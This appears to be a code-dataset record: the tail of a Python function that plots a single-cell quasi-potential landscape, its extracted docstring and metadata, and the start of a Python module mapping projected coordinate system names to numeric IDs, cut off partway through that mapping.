data, creating an rgb array. rgb = ls.shade(Zgrid, plt.cm.RdYlBu) surf = ax.plot_surface( Xgrid, Ygrid, Zgrid, cmap=cm.coolwarm, rstride=1, cstride=1, facecolors=rgb, linewidth=0, antialiased=False, ) # Customize the z axis. ax.zaxis.set_major_locator(LinearLocator(10)) ax.zaxis.set_major_formatter(FormatStrFormatter("%.02f")) # Add a color bar which maps values to colors. # fig.colorbar(surf, shrink=0.5, aspect=5) ax.set_xlabel(basis + "_1") ax.set_ylabel(basis + "_2") ax.set_zlabel("U") if save_show_or_return == "save": s_kwargs = {"path": None, "prefix": 'show_landscape', "dpi": None, "ext": 'pdf', "transparent": True, "close": True, "verbose": True} s_kwargs = update_dict(s_kwargs, save_kwargs) save_fig(**s_kwargs) elif save_show_or_return == "show": plt.tight_layout() plt.show() elif save_show_or_return == "return": return ax # show_pseudopot(Xgrid, Ygrid, Zgrid) # % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% # % % -- Plot selected paths on pot. surface -- # % path_spacing = 4; # % hold on; # % for n_path = 1:numPaths # % if ( ((mod(x_path(n_path, 1), path_spacing) == 0) && (mod(y_path(n_path, 1), path_spacing) == 0)) ... # % || ((mod(y_path(n_path, 1), path_spacing) == 0) && (mod(x_path(n_path, 1), path_spacing) == 0)) ) # % # % % % *** To generate log-log surface *** # % % x_path(n_path, :) = x_path(n_path, :) + 0.1; # % % y_path(n_path, :) = y_path(n_path, :) + 0.1; # % % % *** # % # % if (path_tag(n_path) == 1) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-r' , 'MarkerSize', 1) % plot paths # % elseif (path_tag(n_path) == 2) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-b' , 'MarkerSize', 1) % plot paths # % elseif (path_tag(n_path) == 3) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-g' , 'MarkerSize', 1) % plot paths # % end # % hold on; # % # % end # % end
en
0.585851
Plot the quasi-potential landscape. Parameters ---------- adata: :class:`~anndata.AnnData` AnnData object that contains Xgrid, Ygrid and Zgrid data for visualizing potential landscape. Xgrid: `numpy.ndarray` x-coordinates of the Grid produced from the meshgrid function. Ygrid: `numpy.ndarray` y-coordinates of the Grid produced from the meshgrid function. Zgrid: `numpy.ndarray` z-coordinates or potential at each of the x/y coordinate. basis: `str` (default: umap) The method of dimension reduction. By default it is trimap. Currently it is not checked with Xgrid and Ygrid. save_show_or_return: {'show', 'save', 'return'} (default: `show`) Whether to save, show or return the figure. save_kwargs: `dict` (default: `{}`) A dictionary that will passed to the save_fig function. By default it is an empty dictionary and the save_fig function will use the {"path": None, "prefix": 'show_landscape', "dpi": None, "ext": 'pdf', "transparent": True, "close": True, "verbose": True} as its parameters. Otherwise you can provide a dictionary that properly modify those keys according to your needs. Returns ------- A 3D plot showing the quasi-potential of each cell state. # Plot the surface. # Shade data, creating an rgb array. # Customize the z axis. # Add a color bar which maps values to colors. # fig.colorbar(surf, shrink=0.5, aspect=5) # show_pseudopot(Xgrid, Ygrid, Zgrid) # % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% # % % -- Plot selected paths on pot. surface -- # % path_spacing = 4; # % hold on; # % for n_path = 1:numPaths # % if ( ((mod(x_path(n_path, 1), path_spacing) == 0) && (mod(y_path(n_path, 1), path_spacing) == 0)) ... # % || ((mod(y_path(n_path, 1), path_spacing) == 0) && (mod(x_path(n_path, 1), path_spacing) == 0)) ) # % # % % % *** To generate log-log surface *** # % % x_path(n_path, :) = x_path(n_path, :) + 0.1; # % % y_path(n_path, :) = y_path(n_path, :) + 0.1; # % % % *** # % # % if (path_tag(n_path) == 1) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-r' , 'MarkerSize', 1) % plot paths # % elseif (path_tag(n_path) == 2) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-b' , 'MarkerSize', 1) % plot paths # % elseif (path_tag(n_path) == 3) # % plot3(x_path(n_path, :), y_path(n_path, :), pot_path(n_path, :) ... # % , '-g' , 'MarkerSize', 1) % plot paths # % end # % hold on; # % # % end # % end
2.634554
3
arcrest/projections.py
Esri/arcpy-server-util-rest
10
6627882
import os class Projection(object): def __init__(self): self._name_mapping = {} for key, val in self._projections.items(): self._name_mapping[int(val)] = key setattr(self, key.replace('-', '_'), val) def __getitem__(self, index): return self._name_mapping[int(index)] def __contains__(self, index): return index in self._name_mapping class projected(Projection): _projections = { 'Anguilla_1957_British_West_Indies_Grid': 2000, 'Antigua_1943_British_West_Indies_Grid': 2001, 'Dominica_1945_British_West_Indies_Grid': 2002, 'Grenada_1953_British_West_Indies_Grid': 2003, 'Montserrat_1958_British_West_Indies_Grid': 2004, 'St_Kitts_1955_British_West_Indies_Grid': 2005, 'St_Lucia_1955_British_West_Indies_Grid': 2006, 'St_Vincent_1945_British_West_Indies_Grid': 2007, 'NAD_1927_CGQ77_MTM_2_SCoPQ': 2008, 'NAD_1927_CGQ77_MTM_3_SCoPQ': 2009, 'NAD_1927_CGQ77_MTM_4_SCoPQ': 2010, 'NAD_1927_CGQ77_MTM_5_SCoPQ': 2011, 'NAD_1927_CGQ77_MTM_6_SCoPQ': 2012, 'NAD_1927_CGQ77_MTM_7_SCoPQ': 2013, 'NAD_1927_CGQ77_MTM_8_SCoPQ': 2014, 'NAD_1927_CGQ77_MTM_9_SCoPQ': 2015, 'NAD_1927_CGQ77_MTM_10_SCoPQ': 2016, 'NAD_1927_DEF_1976_MTM_8': 2017, 'NAD_1927_DEF_1976_MTM_9': 2018, 'NAD_1927_DEF_1976_MTM_10': 2019, 'NAD_1927_DEF_1976_MTM_11': 2020, 'NAD_1927_DEF_1976_MTM_12': 2021, 'NAD_1927_DEF_1976_MTM_13': 2022, 'NAD_1927_DEF_1976_MTM_14': 2023, 'NAD_1927_DEF_1976_MTM_15': 2024, 'NAD_1927_DEF_1976_MTM_16': 2025, 'NAD_1927_DEF_1976_MTM_17': 2026, 'NAD_1927_DEF_1976_UTM_Zone_15N': 2027, 'NAD_1927_DEF_1976_UTM_Zone_16N': 2028, 'NAD_1927_DEF_1976_UTM_Zone_17N': 2029, 'NAD_1927_DEF_1976_UTM_Zone_18N': 2030, 'NAD_1927_CGQ77_UTM_Zone_17N': 2031, 'NAD_1927_CGQ77_UTM_Zone_18N': 2032, 'NAD_1927_CGQ77_UTM_Zone_19N': 2033, 'NAD_1927_CGQ77_UTM_Zone_20N': 2034, 'NAD_1927_CGQ77_UTM_Zone_21N': 2035, 'NAD_1983_CSRS_New_Brunswick_Stereographic': 2036, 'NAD_1983_CSRS_UTM_Zone_19N': 2037, 'NAD_1983_CSRS_UTM_Zone_20N': 2038, 'Israel_TM_Grid': 2039, 'Locodjo_1965_UTM_Zone_30N': 2040, 'Abidjan_1987_UTM_Zone_30N': 2041, 'Locodjo_1965_UTM_Zone_29N': 2042, 'Abidjan_1987_UTM_Zone_29N': 2043, 'Hanoi_1972_GK_Zone_18': 2044, 'Hanoi_1972_GK_Zone_19': 2045, 'CH1903+_LV95': 2056, 'Rassadiran_Nakhl_e_Taqi': 2057, 'ED_1950_ED77_UTM_Zone_38N': 2058, 'ED_1950_ED77_UTM_Zone_39N': 2059, 'ED_1950_ED77_UTM_Zone_40N': 2060, 'ED_1950_ED77_UTM_Zone_41N': 2061, 'Madrid_1870_Madrid_Spain': 2062, 'Dabola_1981_UTM_Zone_28N': 2063, 'Dabola_1981_UTM_Zone_29N': 2064, 'S-JTSK_Ferro_Krovak': 2065, 'Mount_Dillon_Tobago_Grid': 2066, 'Naparima_1955_UTM_Zone_20N': 2067, 'ELD_1979_Libya_5': 2068, 'ELD_1979_Libya_6': 2069, 'ELD_1979_Libya_7': 2070, 'ELD_1979_Libya_8': 2071, 'ELD_1979_Libya_9': 2072, 'ELD_1979_Libya_10': 2073, 'ELD_1979_Libya_11': 2074, 'ELD_1979_Libya_12': 2075, 'ELD_1979_Libya_13': 2076, 'ELD_1979_UTM_Zone_32N': 2077, 'ELD_1979_UTM_Zone_33N': 2078, 'ELD_1979_UTM_Zone_34N': 2079, 'ELD_1979_UTM_Zone_35N': 2080, 'Chos_Malal_1914_Argentina_2': 2081, 'Pampa_del_Castillo_Argentina_2': 2082, 'Hito_XVIII_1963_Argentina_2': 2083, 'Hito_XVIII_1963_UTM_19S': 2084, 'NAD_1927_Cuba_Norte': 2085, 'NAD_1927_Cuba_Sur': 2086, 'ELD_1979_TM_12_NE': 2087, 'Carthage_TM_11_NE': 2088, 'Yemen_NGN_1996_UTM_Zone_38N': 2089, 'Yemen_NGN_1996_UTM_Zone_39N': 2090, 'South_Yemen_GK_Zone_8': 2091, 'South_Yemen_GK_Zone_9': 2092, 'Hanoi_1972_GK_106_NE': 2093, 'WGS_1972_BE_TM_106_NE': 2094, 'Bissau_UTM_Zone_28N': 2095, 'Korean_1985_Korea_East_Belt': 2096, 'Korean_1985_Korea_Central_Belt': 2097, 'Korean_1985_Korea_West_Belt': 2098, 'Qatar_1948_Qatar_Grid': 2099, 'Greek_Grid': 2100, 'Lake_Maracaibo_Grid_M1': 2101, 'Lake_Maracaibo_Grid': 2102, 'Lake_Maracaibo_Grid_M3': 2103, 'Lake_Maracaibo_La_Rosa_Grid': 2104, 'NZGD_2000_Mount_Eden_Circuit': 2105, 'NZGD_2000_Bay_of_Plenty_Circuit': 2106, 'NZGD_2000_Poverty_Bay_Circuit': 2107, 'NZGD_2000_Hawkes_Bay_Circuit': 2108, 'NZGD_2000_Taranaki_Circuit': 2109, 'NZGD_2000_Tuhirangi_Circuit': 2110, 'NZGD_2000_Wanganui_Circuit': 2111, 'NZGD_2000_Wairarapa_Circuit': 2112, 'NZGD_2000_Wellington_Circuit': 2113, 'NZGD_2000_Collingwood_Circuit': 2114, 'NZGD_2000_Nelson_Circuit': 2115, 'NZGD_2000_Karamea_Circuit': 2116, 'NZGD_2000_Buller_Circuit': 2117, 'NZGD_2000_Grey_Circuit': 2118, 'NZGD_2000_Amuri_Circuit': 2119, 'NZGD_2000_Marlborough_Circuit': 2120, 'NZGD_2000_Hokitika_Circuit': 2121, 'NZGD_2000_Okarito_Circuit': 2122, 'NZGD_2000_Jacksons_Bay_Circuit': 2123, 'NZGD_2000_Mount_Pleasant_Circuit': 2124, 'NZGD_2000_Gawler_Circuit': 2125, 'NZGD_2000_Timaru_Circuit': 2126, 'NZGD_2000_Lindis_Peak_Circuit': 2127, 'NZGD_2000_Mount_Nicholas_Circuit': 2128, 'NZGD_2000_Mount_York_Circuit': 2129, 'NZGD_2000_Observation_Point_Circuit': 2130, 'NZGD_2000_North_Taieri_Circuit': 2131, 'NZGD_2000_Bluff_Circuit': 2132, 'NZGD_2000_UTM_Zone_58S': 2133, 'NZGD_2000_UTM_Zone_59S': 2134, 'NZGD_2000_UTM_Zone_60S': 2135, 'Accra_Ghana_Grid': 2136, 'Accra_TM_1_NW': 2137, 'NAD_1927_CGQ77_Quebec_Lambert': 2138, 'NAD_1983_CSRS_MTM_2_SCoPQ': 2139, 'NAD_1983_CSRS_MTM_3': 2140, 'NAD_1983_CSRS_MTM_4': 2141, 'NAD_1983_CSRS_MTM_5': 2142, 'NAD_1983_CSRS_MTM_6': 2143, 'NAD_1983_CSRS_MTM_7': 2144, 'NAD_1983_CSRS_MTM_8': 2145, 'NAD_1983_CSRS_MTM_9': 2146, 'NAD_1983_CSRS_MTM_10': 2147, 'NAD_1983_CSRS_UTM_Zone_21N': 2148, 'NAD_1983_CSRS_UTM_Zone_18N': 2149, 'NAD_1983_CSRS_UTM_Zone_17N': 2150, 'NAD_1983_CSRS_UTM_Zone_13N': 2151, 'NAD_1983_CSRS_UTM_Zone_12N': 2152, 'NAD_1983_CSRS_UTM_Zone_11N': 2153, 'RGF_1993_Lambert_93': 2154, 'Samoa_1962_Samoa_Lambert': 2155, 'IRENET95_Irish_Transverse_Mercator': 2157, 'IRENET95_UTM_Zone_29N': 2158, 'Sierra_Leone_1924_New_Colony_Grid': 2159, 'Sierra_Leone_1924_New_War_Office_Grid': 2160, 'Sierra_Leone_1968_UTM_Zone_28N': 2161, 'Sierra_Leone_1968_UTM_Zone_29N': 2162, 'US_National_Atlas_Equal_Area': 2163, 'Locodjo_1965_TM_5_NW': 2164, 'Abidjan_1987_TM_5_NW': 2165, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_3': 2166, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_4': 2167, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_5': 2168, 'Luxembourg_1930_Gauss': 2169, 'MGI_Slovenia_Grid': 2170, 'Pulkovo_1942_Adj_1958_Poland_Zone_II': 2172, 'Pulkovo_1942_Adj_1958_Poland_Zone_III': 2173, 'Pulkovo_1942_Adj_1958_Poland_Zone_IV': 2174, 'Pulkovo_1942_Adj_1958_Poland_Zone_V': 2175, 'ETRS_1989_Poland_CS2000_Zone_5': 2176, 'ETRS_1989_Poland_CS2000_Zone_6': 2177, 'ETRS_1989_Poland_CS2000_Zone_7': 2178, 'ETRS_1989_Poland_CS2000_Zone_8': 2179, 'ETRS_1989_Poland_CS92': 2180, 'ED_1950_Turkey_9': 2181, 'ED_1950_Turkey_10': 2182, 'ED_1950_Turkey_11': 2183, 'ED_1950_Turkey_12': 2184, 'ED_1950_Turkey_13': 2185, 'ED_1950_Turkey_14': 2186, 'ED_1950_Turkey_15': 2187, 'Azores_Occidental_1939_UTM_Zone_25N': 2188, 'Azores_Central_1948_UTM_Zone_26N': 2189, 'Azores_Oriental_1940_UTM_Zone_26N': 2190, 'ED_1950_France_EuroLambert': 2192, 'NZGD_2000_New_Zealand_Transverse_Mercator': 2193, 'NAD_1983_HARN_UTM_Zone_2S': 2195, 'ETRS_1989_Kp2000_Jutland': 2196, 'ETRS_1989_Kp2000_Zealand': 2197, 'ETRS_1989_Kp2000_Bornholm': 2198, 'ATS_1977_New_Brunswick_Stereographic': 2200, 'REGVEN_UTM_Zone_18N': 2201, 'REGVEN_UTM_Zone_19N': 2202, 'REGVEN_UTM_Zone_20N': 2203, 'NAD_1927_StatePlane_Tennessee_FIPS_4100': 2204, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601': 2205, 'ED_1950_3_Degree_GK_Zone_9': 2206, 'ED_1950_3_Degree_GK_Zone_10': 2207, 'ED_1950_3_Degree_GK_Zone_11': 2208, 'ED_1950_3_Degree_GK_Zone_12': 2209, 'ED_1950_3_Degree_GK_Zone_13': 2210, 'ED_1950_3_Degree_GK_Zone_14': 2211, 'ED_1950_3_Degree_GK_Zone_15': 2212, 'ETRS_1989_TM_30_NE': 2213, 'Douala_1948_AEF_West': 2214, 'Manoca_1962_UTM_Zone_32N': 2215, 'Qornoq_1927_UTM_Zone_22N': 2216, 'Qornoq_1927_UTM_Zone_23N': 2217, 'ATS_1977_UTM_Zone_19N': 2219, 'ATS_1977_UTM_Zone_20N': 2220, 'NAD_1983_StatePlane_Arizona_East_FIPS_0201_Feet_Intl': 2222, 'NAD_1983_StatePlane_Arizona_Central_FIPS_0202_Feet_Intl': 2223, 'NAD_1983_StatePlane_Arizona_West_FIPS_0203_Feet_Intl': 2224, 'NAD_1983_StatePlane_California_I_FIPS_0401_Feet': 2225, 'NAD_1983_StatePlane_California_II_FIPS_0402_Feet': 2226, 'NAD_1983_StatePlane_California_III_FIPS_0403_Feet': 2227, 'NAD_1983_StatePlane_California_IV_FIPS_0404_Feet': 2228, 'NAD_1983_StatePlane_California_V_FIPS_0405_Feet': 2229, 'NAD_1983_StatePlane_California_VI_FIPS_0406_Feet': 2230, 'NAD_1983_StatePlane_Colorado_North_FIPS_0501_Feet': 2231, 'NAD_1983_StatePlane_Colorado_Central_FIPS_0502_Feet': 2232, 'NAD_1983_StatePlane_Colorado_South_FIPS_0503_Feet': 2233, 'NAD_1983_StatePlane_Connecticut_FIPS_0600_Feet': 2234, 'NAD_1983_StatePlane_Delaware_FIPS_0700_Feet': 2235, 'NAD_1983_StatePlane_Florida_East_FIPS_0901_Feet': 2236, 'NAD_1983_StatePlane_Florida_West_FIPS_0902_Feet': 2237, 'NAD_1983_StatePlane_Florida_North_FIPS_0903_Feet': 2238, 'NAD_1983_StatePlane_Georgia_East_FIPS_1001_Feet': 2239, 'NAD_1983_StatePlane_Georgia_West_FIPS_1002_Feet': 2240, 'NAD_1983_StatePlane_Idaho_East_FIPS_1101_Feet': 2241, 'NAD_1983_StatePlane_Idaho_Central_FIPS_1102_Feet': 2242, 'NAD_1983_StatePlane_Idaho_West_FIPS_1103_Feet': 2243, 'NAD_1983_StatePlane_Indiana_East_FIPS_1301_Feet': 2244, 'NAD_1983_StatePlane_Indiana_West_FIPS_1302_Feet': 2245, 'NAD_1983_StatePlane_Kentucky_North_FIPS_1601_Feet': 2246, 'NAD_1983_StatePlane_Kentucky_South_FIPS_1602_Feet': 2247, 'NAD_1983_StatePlane_Maryland_FIPS_1900_Feet': 2248, 'NAD_1983_StatePlane_Massachusetts_Mainland_FIPS_2001_Feet': 2249, 'NAD_1983_StatePlane_Massachusetts_Island_FIPS_2002_Feet': 2250, 'NAD_1983_StatePlane_Michigan_North_FIPS_2111_Feet_Intl': 2251, 'NAD_1983_StatePlane_Michigan_Central_FIPS_2112_Feet_Intl': 2252, 'NAD_1983_StatePlane_Michigan_South_FIPS_2113_Feet_Intl': 2253, 'NAD_1983_StatePlane_Mississippi_East_FIPS_2301_Feet': 2254, 'NAD_1983_StatePlane_Mississippi_West_FIPS_2302_Feet': 2255, 'NAD_1983_StatePlane_Montana_FIPS_2500_Feet_Intl': 2256, 'NAD_1983_StatePlane_New_Mexico_East_FIPS_3001_Feet': 2257, 'NAD_1983_StatePlane_New_Mexico_Central_FIPS_3002_Feet': 2258, 'NAD_1983_StatePlane_New_Mexico_West_FIPS_3003_Feet': 2259, 'NAD_1983_StatePlane_New_York_East_FIPS_3101_Feet': 2260, 'NAD_1983_StatePlane_New_York_Central_FIPS_3102_Feet': 2261, 'NAD_1983_StatePlane_New_York_West_FIPS_3103_Feet': 2262, 'NAD_1983_StatePlane_New_York_Long_Island_FIPS_3104_Feet': 2263, 'NAD_1983_StatePlane_North_Carolina_FIPS_3200_Feet': 2264, 'NAD_1983_StatePlane_North_Dakota_North_FIPS_3301_Feet_Intl': 2265, 'NAD_1983_StatePlane_North_Dakota_South_FIPS_3302_Feet_Intl': 2266, 'NAD_1983_StatePlane_Oklahoma_North_FIPS_3501_Feet': 2267, 'NAD_1983_StatePlane_Oklahoma_South_FIPS_3502_Feet': 2268, 'NAD_1983_StatePlane_Oregon_North_FIPS_3601_Feet_Intl': 2269, 'NAD_1983_StatePlane_Oregon_South_FIPS_3602_Feet_Intl': 2270, 'NAD_1983_StatePlane_Pennsylvania_North_FIPS_3701_Feet': 2271, 'NAD_1983_StatePlane_Pennsylvania_South_FIPS_3702_Feet': 2272, 'NAD_1983_StatePlane_South_Carolina_FIPS_3900_Feet_Intl': 2273, 'NAD_1983_StatePlane_Tennessee_FIPS_4100_Feet': 2274, 'NAD_1983_StatePlane_Texas_North_FIPS_4201_Feet': 2275, 'NAD_1983_StatePlane_Texas_North_Central_FIPS_4202_Feet': 2276, 'NAD_1983_StatePlane_Texas_Central_FIPS_4203_Feet': 2277, 'NAD_1983_StatePlane_Texas_South_Central_FIPS_4204_Feet': 2278, 'NAD_1983_StatePlane_Texas_South_FIPS_4205_Feet': 2279, 'NAD_1983_StatePlane_Utah_North_FIPS_4301_Feet_Intl': 2280, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302_Feet_Intl': 2281, 'NAD_1983_StatePlane_Utah_South_FIPS_4303_Feet_Intl': 2282, 'NAD_1983_StatePlane_Virginia_North_FIPS_4501_Feet': 2283, 'NAD_1983_StatePlane_Virginia_South_FIPS_4502_Feet': 2284, 'NAD_1983_StatePlane_Washington_North_FIPS_4601_Feet': 2285, 'NAD_1983_StatePlane_Washington_South_FIPS_4602_Feet': 2286, 'NAD_1983_StatePlane_Wisconsin_North_FIPS_4801_Feet': 2287, 'NAD_1983_StatePlane_Wisconsin_Central_FIPS_4802_Feet': 2288, 'NAD_1983_StatePlane_Wisconsin_South_FIPS_4803_Feet': 2289, 'Prince_Edward_Island_Stereographic': 2290, 'NAD_1983_CSRS_Prince_Edward_Island': 2291, 'NAD_1983_CSRS_Prince_Edward_Island': 2292, 'ATS_1977_MTM_4_Nova_Scotia': 2294, 'ATS_1977_MTM_5_Nova_Scotia': 2295, 'Batavia_TM_109_SE': 2308, 'WGS_1984_TM_116_SE': 2309, 'WGS_1984_TM_132_SE': 2310, 'WGS_1984_TM_6_NE': 2311, 'Garoua_UTM_Zone_33N': 2312, 'Kousseri_UTM_Zone_33N': 2313, 'Trinidad_1903_Trinidad_Grid_Feet_Clarke': 2314, 'Campo_Inchauspe_UTM_19S': 2315, 'Campo_Inchauspe_UTM_20S': 2316, 'PSAD_1956_ICN_Regional': 2317, 'Ain_el_Abd_Aramco_Lambert': 2318, 'ED_1950_TM27': 2319, 'ED_1950_TM30': 2320, 'ED_1950_TM33': 2321, 'ED_1950_TM36': 2322, 'ED_1950_TM39': 2323, 'ED_1950_TM42': 2324, 'ED_1950_TM45': 2325, 'Hong_Kong_1980_Grid': 2326, 'Xian_1980_GK_Zone_13': 2327, 'Xian_1980_GK_Zone_14': 2328, 'Xian_1980_GK_Zone_15': 2329, 'Xian_1980_GK_Zone_16': 2330, 'Xian_1980_GK_Zone_17': 2331, 'Xian_1980_GK_Zone_18': 2332, 'Xian_1980_GK_Zone_19': 2333, 'Xian_1980_GK_Zone_20': 2334, 'Xian_1980_GK_Zone_21': 2335, 'Xian_1980_GK_Zone_22': 2336, 'Xian_1980_GK_Zone_23': 2337, 'Xian_1980_GK_CM_75E': 2338, 'Xian_1980_GK_CM_81E': 2339, 'Xian_1980_GK_CM_87E': 2340, 'Xian_1980_GK_CM_93E': 2341, 'Xian_1980_GK_CM_99E': 2342, 'Xian_1980_GK_CM_105E': 2343, 'Xian_1980_GK_CM_111E': 2344, 'Xian_1980_GK_CM_117E': 2345, 'Xian_1980_GK_CM_123E': 2346, 'Xian_1980_GK_CM_129E': 2347, 'Xian_1980_GK_CM_135E': 2348, 'Xian_1980_3_Degree_GK_Zone_25': 2349, 'Xian_1980_3_Degree_GK_Zone_26': 2350, 'Xian_1980_3_Degree_GK_Zone_27': 2351, 'Xian_1980_3_Degree_GK_Zone_28': 2352, 'Xian_1980_3_Degree_GK_Zone_29': 2353, 'Xian_1980_3_Degree_GK_Zone_30': 2354, 'Xian_1980_3_Degree_GK_Zone_31': 2355, 'Xian_1980_3_Degree_GK_Zone_32': 2356, 'Xian_1980_3_Degree_GK_Zone_33': 2357, 'Xian_1980_3_Degree_GK_Zone_34': 2358, 'Xian_1980_3_Degree_GK_Zone_35': 2359, 'Xian_1980_3_Degree_GK_Zone_36': 2360, 'Xian_1980_3_Degree_GK_Zone_37': 2361, 'Xian_1980_3_Degree_GK_Zone_38': 2362, 'Xian_1980_3_Degree_GK_Zone_39': 2363, 'Xian_1980_3_Degree_GK_Zone_40': 2364, 'Xian_1980_3_Degree_GK_Zone_41': 2365, 'Xian_1980_3_Degree_GK_Zone_42': 2366, 'Xian_1980_3_Degree_GK_Zone_43': 2367, 'Xian_1980_3_Degree_GK_Zone_44': 2368, 'Xian_1980_3_Degree_GK_Zone_45': 2369, 'Xian_1980_3_Degree_GK_CM_75E': 2370, 'Xian_1980_3_Degree_GK_CM_78E': 2371, 'Xian_1980_3_Degree_GK_CM_81E': 2372, 'Xian_1980_3_Degree_GK_CM_84E': 2373, 'Xian_1980_3_Degree_GK_CM_87E': 2374, 'Xian_1980_3_Degree_GK_CM_90E': 2375, 'Xian_1980_3_Degree_GK_CM_93E': 2376, 'Xian_1980_3_Degree_GK_CM_96E': 2377, 'Xian_1980_3_Degree_GK_CM_99E': 2378, 'Xian_1980_3_Degree_GK_CM_102E': 2379, 'Xian_1980_3_Degree_GK_CM_105E': 2380, 'Xian_1980_3_Degree_GK_CM_108E': 2381, 'Xian_1980_3_Degree_GK_CM_111E': 2382, 'Xian_1980_3_Degree_GK_CM_114E': 2383, 'Xian_1980_3_Degree_GK_CM_117E': 2384, 'Xian_1980_3_Degree_GK_CM_120E': 2385, 'Xian_1980_3_Degree_GK_CM_123E': 2386, 'Xian_1980_3_Degree_GK_CM_126E': 2387, 'Xian_1980_3_Degree_GK_CM_129E': 2388, 'Xian_1980_3_Degree_GK_CM_132E': 2389, 'Xian_1980_3_Degree_GK_CM_135E': 2390, 'Finland_Zone_1': 2391, 'Finland_Zone_2': 2392, 'Finland_Zone_3': 2393, 'Finland_Zone_4': 2394, 'South_Yemen_GK_Zone_8': 2395, 'South_Yemen_GK_Zone_9': 2396, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_3': 2397, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_4': 2398, 'Pulkovo_1942_Adj_1983_3_Degree_GK_Zone_5': 2399, 'RT90_25_gon_W': 2400, 'Beijing_1954_3_Degree_GK_Zone_25': 2401, 'Beijing_1954_3_Degree_GK_Zone_26': 2402, 'Beijing_1954_3_Degree_GK_Zone_27': 2403, 'Beijing_1954_3_Degree_GK_Zone_28': 2404, 'Beijing_1954_3_Degree_GK_Zone_29': 2405, 'Beijing_1954_3_Degree_GK_Zone_30': 2406, 'Beijing_1954_3_Degree_GK_Zone_31': 2407, 'Beijing_1954_3_Degree_GK_Zone_32': 2408, 'Beijing_1954_3_Degree_GK_Zone_33': 2409, 'Beijing_1954_3_Degree_GK_Zone_34': 2410, 'Beijing_1954_3_Degree_GK_Zone_35': 2411, 'Beijing_1954_3_Degree_GK_Zone_36': 2412, 'Beijing_1954_3_Degree_GK_Zone_37': 2413, 'Beijing_1954_3_Degree_GK_Zone_38': 2414, 'Beijing_1954_3_Degree_GK_Zone_39': 2415, 'Beijing_1954_3_Degree_GK_Zone_40': 2416, 'Beijing_1954_3_Degree_GK_Zone_41': 2417, 'Beijing_1954_3_Degree_GK_Zone_42': 2418, 'Beijing_1954_3_Degree_GK_Zone_43': 2419, 'Beijing_1954_3_Degree_GK_Zone_44': 2420, 'Beijing_1954_3_Degree_GK_Zone_45': 2421, 'Beijing_1954_3_Degree_GK_CM_75E': 2422, 'Beijing_1954_3_Degree_GK_CM_78E': 2423, 'Beijing_1954_3_Degree_GK_CM_81E': 2424, 'Beijing_1954_3_Degree_GK_CM_84E': 2425, 'Beijing_1954_3_Degree_GK_CM_87E': 2426, 'Beijing_1954_3_Degree_GK_CM_90E': 2427, 'Beijing_1954_3_Degree_GK_CM_93E': 2428, 'Beijing_1954_3_Degree_GK_CM_96E': 2429, 'Beijing_1954_3_Degree_GK_CM_99E': 2430, 'Beijing_1954_3_Degree_GK_CM_102E': 2431, 'Beijing_1954_3_Degree_GK_CM_105E': 2432, 'Beijing_1954_3_Degree_GK_CM_108E': 2433, 'Beijing_1954_3_Degree_GK_CM_111E': 2434, 'Beijing_1954_3_Degree_GK_CM_114E': 2435, 'Beijing_1954_3_Degree_GK_CM_117E': 2436, 'Beijing_1954_3_Degree_GK_CM_120E': 2437, 'Beijing_1954_3_Degree_GK_CM_123E': 2438, 'Beijing_1954_3_Degree_GK_CM_126E': 2439, 'Beijing_1954_3_Degree_GK_CM_129E': 2440, 'Beijing_1954_3_Degree_GK_CM_132E': 2441, 'Beijing_1954_3_Degree_GK_CM_135E': 2442, 'JGD_2000_Japan_Zone_1': 2443, 'JGD_2000_Japan_Zone_2': 2444, 'JGD_2000_Japan_Zone_3': 2445, 'JGD_2000_Japan_Zone_4': 2446, 'JGD_2000_Japan_Zone_5': 2447, 'JGD_2000_Japan_Zone_6': 2448, 'JGD_2000_Japan_Zone_7': 2449, 'JGD_2000_Japan_Zone_8': 2450, 'JGD_2000_Japan_Zone_9': 2451, 'JGD_2000_Japan_Zone_10': 2452, 'JGD_2000_Japan_Zone_11': 2453, 'JGD_2000_Japan_Zone_12': 2454, 'JGD_2000_Japan_Zone_13': 2455, 'JGD_2000_Japan_Zone_14': 2456, 'JGD_2000_Japan_Zone_15': 2457, 'JGD_2000_Japan_Zone_16': 2458, 'JGD_2000_Japan_Zone_17': 2459, 'JGD_2000_Japan_Zone_18': 2460, 'JGD_2000_Japan_Zone_19': 2461, 'Albanian_1987_GK_Zone_4': 2462, 'Pulkovo_1942_3_Degree_GK_Zone_7': 2523, 'Pulkovo_1942_3_Degree_GK_Zone_8': 2524, 'Pulkovo_1942_3_Degree_GK_Zone_9': 2525, 'Pulkovo_1942_3_Degree_GK_Zone_10': 2526, 'Pulkovo_1942_3_Degree_GK_Zone_11': 2527, 'Pulkovo_1942_3_Degree_GK_Zone_12': 2528, 'Pulkovo_1942_3_Degree_GK_Zone_13': 2529, 'Pulkovo_1942_3_Degree_GK_Zone_14': 2530, 'Pulkovo_1942_3_Degree_GK_Zone_15': 2531, 'Pulkovo_1942_3_Degree_GK_Zone_16': 2532, 'Pulkovo_1942_3_Degree_GK_Zone_17': 2533, 'Pulkovo_1942_3_Degree_GK_Zone_18': 2534, 'Pulkovo_1942_3_Degree_GK_Zone_19': 2535, 'Pulkovo_1942_3_Degree_GK_Zone_20': 2536, 'Pulkovo_1942_3_Degree_GK_Zone_21': 2537, 'Pulkovo_1942_3_Degree_GK_Zone_22': 2538, 'Pulkovo_1942_3_Degree_GK_Zone_23': 2539, 'Pulkovo_1942_3_Degree_GK_Zone_24': 2540, 'Pulkovo_1942_3_Degree_GK_Zone_25': 2541, 